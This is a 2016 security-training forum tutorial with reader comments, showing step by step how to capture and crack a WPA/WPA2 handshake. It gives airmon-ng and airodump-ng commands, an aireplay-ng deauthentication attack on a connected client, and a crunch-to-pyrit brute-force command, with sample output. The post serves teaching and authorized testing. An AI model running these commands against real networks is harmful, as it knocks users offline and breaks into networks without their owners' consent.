Manual WPA/WPA2 Hacking & Cracking [Evox]

April 14, 2016 | Views: 17145

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Manual WPA/WPA2 Hacking & Cracking

 

(This is by no means meant to be followed and actually used unless you have the time and resources.

Please use this as an informative post. This method is obsolete as there are tools mentioned at the bottom of the post to automate this process.

I am in no way responsible if you decide to follow this step by step and wind up failing your hdd. 

Aircrack can be hit & miss with correctly identifying a WPA Handshake).

 

 

 

Tools used:

aircrack suite

crunch

pyrit

wireless card capable of packet injection

 

 

To begin the process of hacking a targeted wireless network, set the wireless card into monitor mode by using the following command in terminal. (The entire process will be done within terminal as root)

 

airmon-ng start wlan0

 

 

This will create an interface named mon0. This name of the interface will sometimes vary from user to user.

 

If there are processes that cause the wireless card to not be set into monitor mode, run the following in terminal.

 

airmon-ng check kill
airmon-ng start wlan0

 

 

Next airodump will be used to scan for networks within range.

 

airodump-ng mon0

 

 

Wait for airodump to display the targeted network. Once the network is shown, stop airodump and copy down the BSSID. If you are documenting the process, now is also a good time to take note of what channel the network is on as well as any STATION associated with the BSSID.

 

Now begin capturing files on the target network and write them to a file.

This can be done using the following command.

 

airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME mon0

 

Replace # with the network channel, XX:XX:XX:XX:XX:XX with the MAC of the network, and FILENAME with whatever you’d like.

 

airodump should only capturing files on the targeted network and fixed to the specified channel.

Example

CH  1 ][ Elapsed: 19 s ][ 2016-03-26 03:11 ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85		  		 WPA2 CCMP   PSK  VICTIM

 BSSID				STATION		   		PWR	  Rate		Lost	Frames	Probe

XX:XX:XX:XX:XX:XX	XX:XX:XX:XX:XX:XX   -34   36e-36e      3       170

 

If you are having trouble fixing your interface to the specified channel, you may need to run the following code.

 

airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME --ignore-negative-one mon0

 

 

Now capture a WPA handshake so that it can be cracked.

This can be done by waiting for a user to connect to the network or using a deauth attack via aireplay.

Since this is a tutorial, run a deauth attack against a specified STATION on the network.

 

To do this, run the following code in a separate terminal

aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX mon0

 

replace -a XX:XX:XX:XX:XX:XX with the BSSID and -c XX:XX:XX:XX:XX:XX with the STATION associated with the BSSID. –deauth 0 means that it will run very quickly at an interval of a whopping 0 seconds. Run this for a few seconds and then stop it via ctrl+c.

 

If lucky, airodump should now say [ WPA XX:XX:XX:XX:XX:XX ]

where XX:XX:XX:XX:XX:XX is equal to the BSSID.

 

example from the top of airodump

CH  1 ][ Elapsed: 54 s ][ 2016-03-26 03:12 ][ WPA XX:XX:XX:XX:XX:XX ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85		  		 WPA2 CCMP   PSK  VICTIM

 BSSID				STATION		   		PWR	  Rate		Lost	Frames	Probe

XX:XX:XX:XX:XX:XX	XX:XX:XX:XX:XX:XX   -34   36e-36e   187       2435

 

 

Now, if successful in capturing the handshake, stop airodump and begin cracking the file.

 

To be sure the handshake was captured, run the following in terminal.

aircrack-ng FILENAME-01.cap

 

replace FILENAME with whatever you chose to name your file while running airodump.

If you are unsure, look in your home directory for the .cap file.

 

The output should be something similar to this

root@kali:~# aircrack-ng FILENAME-01.cap
Opening FILENAME-01.cap
Read XXXX packets.
   #  BSSID              ESSID                     Encryption
   1  XX:XX:XX:XX:XX:XX  VICTIM                    WPA (1 handshake)

 

 

Next use crunch to generate a word-list and pyrit to crack the file by using GPU power with the following command.

!!WARNING!! Crunch can take up an enormous amount of space and may cause your hdd to fail. Adjust the code to your needs !!WARNING!!

crunch 8 14 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough

 

8 is used because of the minimum for WPA/WPA2 password length

14 can be changed to a higher or lower value.

FILENAME-01.cap if your specified file

-b XX:XX:XX:XX:XX:XX is the bssid

If you know the length of the pass word then you can enter X X

for example, if i knew the password was only 8 characters or numbers, I would use 8 8.

 

You can also shorten the amount of time spent cracking if you already know the password.

For example, if i were cracking the password a1b2c3d4 the following code could be used instead.

crunch 8 8 abcd1234 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough

 

 

 

That concludes Manually hacking & Cracking a WPA/WPA2 secured wireless network.

This entire process can be automated with tools such as Reaver, wifite, & hashcat. (I will write tutorials as requested).

Online services are also available for cracking the handshake.

If you have any questions or comments regarding this process, please comment below.

 

I do not take any responsibility with what you decide to do with the information provided within this post.

Make sure you have authorization if using the methods described on a network other than your own.

 

~Evox

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
53 Comments
  1. Kali Linux 2.0 Installation Steps in Virtual Box – Hacking OS – Tutorial

    https://www.youtube.com/watch?v=jk2KGdJU2OI

  2. I tried installing a virtual box kali linux so I don’t actually cause my HDD to fail, but I’m unable to install a virtual box of kali linux. Could you recommend any videos to watch so I can practice Linux?

    Thanks,

    • Installing Kali in a virtual machine and following the OP terminal commands without editing the first crunch/pyrit command will not keep you from failing your HDD. Instead, you will likely use all of the allocated HDD space for that VM that you have set up.

      Check the official Kali website for exact directions for installing Kali Linux on a virtual machine. The forums should have the answer to just about any question you have during the process as well as after.

      Should you have any further questions, please message me.

      ~Evox

    • Kali Linux 2.0 Installation Steps in Virtual Box – Hacking OS – Tutorial
      https://www.youtube.com/watch?v=jk2KGdJU2OI

  3. will that method of hacking work for wifi whose wps is locked??

  4. Outstanding, Evox!

Page 4 of 5«12345»
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel